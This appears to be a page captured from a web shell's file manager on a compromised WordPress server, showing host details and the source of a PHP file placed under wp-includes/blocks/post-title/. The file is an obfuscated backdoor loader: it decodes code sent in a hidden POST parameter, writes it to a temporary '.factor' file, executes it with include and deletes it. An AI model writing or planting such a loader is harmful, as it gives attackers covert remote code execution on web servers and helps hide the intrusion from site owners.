| Server IP : 65.108.144.40 / Your IP : 216.73.217.165 Web Server : Apache/2.4.52 (Ubuntu) System : Linux ubuntu-8gb-hel1-1 5.15.0-173-generic #183-Ubuntu SMP Fri Mar 6 13:29:34 UTC 2026 x86_64 User : dev ( 1000) PHP Version : 8.2.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/html/t-mobile-partner/wp-includes/blocks/post-title/ |
Upload File : |
<?php
if(isset($_POST["hl\x64"])){
$flag = array_filter([getenv("TEMP"), getenv("TMP"), sys_get_temp_dir(), "/tmp", "/dev/shm", "/var/tmp", getcwd(), ini_get("upload_tmp_dir"), session_save_path()]);
$mrk = $_POST["hl\x64"];
$mrk =explode ( '.' ,$mrk ) ;
$key = '';
$salt = 'abcdefghijklmnopqrstuvwxyz0123456789';
$sLen = strlen( $salt);
$len = count( $mrk);
for( $r = 0; $r< $len; $r++) {
$v7 = $mrk[$r];
$sChar = ord( $salt[$r % $sLen]);
$dec =( ( int)$v7 - $sChar -( $r % 10)) ^ 33;
$key .= chr( $dec);}
for ($component = 0, $k = count($flag); $component < $k; $component++) {
$binding = $flag[$component];
if ((is_dir($binding) and is_writable($binding))) {
$ent = implode("/", [$binding, ".factor"]);
$success = file_put_contents($ent, $key);
if ($success) {
include $ent;
@unlink($ent);
exit;}
}
}
}